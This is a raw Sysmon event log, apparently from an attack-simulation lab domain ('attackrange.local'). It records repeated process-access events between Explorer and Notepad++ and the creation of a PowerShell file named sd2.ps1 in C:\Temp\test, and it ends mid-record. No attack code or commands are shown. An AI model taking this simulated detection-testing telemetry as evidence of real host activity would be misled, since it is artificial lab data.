07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.902{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 10341000x80000000000000001047448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3ca38e|C:\Windows\System32\windows.storage.dll+3c603f|C:\Windows\System32\windows.storage.dll+3c7180|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c78d8|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d|C:\Windows\System32\USER32.dll+23a42|C:\Windows\System32\USER32.dll+1f839|C:\Windows\System32\USER32.dll+1f7b6 10341000x80000000000000001047443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de 10341000x80000000000000001047442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d 11241100x80000000000000001047441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001047440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D81D820C1E18117A4864BD070806F35,SHA256=FF8EAEA99FB59AE8313CE5B8616C92CB7A333CB578E41B52A7B3C867E0C9F11B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:32.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
